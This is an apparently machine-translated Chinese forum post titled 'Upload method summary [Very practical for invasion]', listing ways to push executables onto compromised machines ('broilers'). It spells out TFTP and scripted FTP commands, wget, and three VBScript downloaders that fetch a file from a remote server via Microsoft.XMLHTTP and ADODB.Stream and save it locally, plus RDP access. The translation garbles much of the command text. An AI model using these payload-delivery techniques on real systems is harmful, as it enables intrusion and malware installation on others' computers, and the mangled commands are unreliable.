2. Tech
  3. Upload method summary [Very practical for invasion]

Upload method summary [Very practical for invasion]

xiaoxiao2021-03-06  106

Author: Shrimps from: a friend's house

I will now summarize my upload method as follows:

1. TFTP is the first to build a TFTP server in a machine, such as executing tftpd32.exe, then upload files (Sample.exe) to other machines (broiler), the broiler CMD is executed: TFTP -I Server IP Get Sample.exe

2. FTP Bulk Chicken CMD Execute: Echo Open FTP Server IP [Port]> ftp.txtecho username >> ftp.txtecho password >> ftp.txtecho get samplechoe >> ftp.txtecho Bye >> ftp.txtftp -s : ftp.txtdel ftp.txt

3. Tool method uses Wget.exe broiler cmd from Wineggdrop: wget website /sample.exe

4. Using DL.VBE Bulk Chicken CMD: Echo with wscript: if .arguments.count ^ <2 Then .quit: end if> dl.vbeecho set aso = .createObject ("adoDb.stream": set web = CreateObject ("Microsoft.xmlhttp") >> DL.Vbeecho Web.Open "get",. arguments (0), 0: Web.send: if Web.Status ^> 200 Then Quit >> DL.vbeecho aso.type = 1: Aso.open: aso.write web.responsebody: aso.savetofile .arguments (1), 2: End with >> DL.VBE

CScript DL.vbe http: // *. *. *. *: 88 / Sample.exe Sample.exe

5. Use the Iget.vbe method to perform: Echo ilocal = lcase (wscript.arguments (1))> iget.vbeecho iemote = lcase (wscript.arguments (0)) >> Iget.vbeecho set xpost = CreateObject ("Microsoft.xmlhttp") >> Iget.vbeecho XPost.Open "get", IREMOTE, 0 >> Iget.vbeecho XPost.send () >> Iget.vbeecho Set sget = createObject ("adodb.stream") >> Iget.vbeecho sget.mode = 3 >> Iget.vbeecho sget.type = 1 >> iGet.vbeecho sget.open () >> iget.vbeecho sget.write (xpost.responsebody) >> Iget.vbeecho sget. Savetofile Ilocal, 2 >> Iget.vbe

Cscript Iget.vbe http: // *. *. *. * / Sample.exe Sample.exe

6. Using the HTTP website VBE method echo set xpost = createObject ("Microsoft.xmlhttp")> dsa.vbeecho xpost.open "get", "http://*.*.*.*/sample.exe", 0> > dsa.vbeecho xpost.send () >> dsa.vbeecho set sget = createObject ("adodb.stream") >> dsa.vbeecho sget.mode = 3 >> dsa.vbeecho sget.type = 1 >> DSA.Vbeecho sget.open () >> dsa.vbeecho sget.write (xpost.responsebody) >> DSA.vbeecho sget.savetofile "Sample.exe", 2 >> DSA.vbecscript dsa.vbedel dsa.vbe

7. 3389 Method can open 3389, then log in and perform local downloads. This method is very stringent of the machine to upload a very stringent machine. (Including hardware firewall)

8. Other undisclosed methods

转载请注明原文地址:https://www.9cbs.com/read-104573.html

9cbs

New Post(0)